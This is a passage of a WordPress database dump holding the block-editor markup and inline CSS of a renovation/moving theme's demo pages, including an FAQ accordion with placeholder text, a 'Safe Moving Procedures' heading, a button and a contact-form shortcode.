32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"ba99dfce-9116-4845-8e60-03c1e0b77033\"} -->\n<style type=\"text/css\"> .block-ba99dfce-9116-4845-8e60-03c1e0b77033 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ba99dfce-9116-4845-8e60-03c1e0b77033 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ba99dfce-9116-4845-8e60-03c1e0b77033 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ba99dfce-9116-4845-8e60-03c1e0b77033 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ba99dfce-9116-4845-8e60-03c1e0b77033 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ba99dfce-9116-4845-8e60-03c1e0b77033\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"00bcc646-b9f9-4269-b8f2-1ee651451bd3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-00bcc646-b9f9-4269-b8f2-1ee651451bd3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"20101fda-652d-4e9d-bbf2-8356cbbd159e\"} -->\n<style type=\"text/css\"> .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-20101fda-652d-4e9d-bbf2-8356cbbd159e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-20101fda-652d-4e9d-bbf2-8356cbbd159e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"9233ad09-887b-4640-b6d5-52cbf1a1e24c\"} -->\n<style type=\"text/css\"> .block-9233ad09-887b-4640-b6d5-52cbf1a1e24c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9233ad09-887b-4640-b6d5-52cbf1a1e24c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9233ad09-887b-4640-b6d5-52cbf1a1e24c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9233ad09-887b-4640-b6d5-52cbf1a1e24c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9233ad09-887b-4640-b6d5-52cbf1a1e24c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9233ad09-887b-4640-b6d5-52cbf1a1e24c\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"13dec17a-7f43-4949-8ca9-1b3fb0e7939a\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-13dec17a-7f43-4949-8ca9-1b3fb0e7939a\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"23504faf-8c78-4bf1-9eda-b9b4a60aef58\"} -->\n<style type=\"text/css\"> .block-23504faf-8c78-4bf1-9eda-b9b4a60aef58 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-23504faf-8c78-4bf1-9eda-b9b4a60aef58 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-23504faf-8c78-4bf1-9eda-b9b4a60aef58 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-23504faf-8c78-4bf1-9eda-b9b4a60aef58 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-23504faf-8c78-4bf1-9eda-b9b4a60aef58 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-23504faf-8c78-4bf1-9eda-b9b4a60aef58\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a3a7f8e1-d3ba-413d-9b6f-e963bd071379\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"722632ab\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2021-05-25 05:46:14','2021-05-25 05:46:14','',336,'https://cteisys.com/?p=338',0,'revision','',0),(140,1,'2021-05-27 05:06:35','2021-05-27 05:06:35','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:shortcode -->\n[contact-form-7 id=\"6\" title=\"Contact form 1\"]\n<!-- /wp:shortcode --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->','Contact Layout 1','','publish','closed','closed','','contact-layout-1','','','2022-08-22 22:30:32','2022-08-22 22:30:32','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=140',0,'page','',0),(154,1,'2021-05-27 05:10:37','2021-05-27 05:10:37','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"64ec1679-1999-47ef-97b2-c5e75287bc99\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-64ec1679-1999-47ef-97b2-c5e75287bc99 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-64ec1679-1999-47ef-97b2-c5e75287bc99.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-64ec1679-1999-47ef-97b2-c5e75287bc99.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-64ec1679-1999-47ef-97b2-c5e75287bc99.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f55ba5b9-42b3-4ff0-9a0a-564a1640e0af\"} -->\n<style type=\"text/css\"> 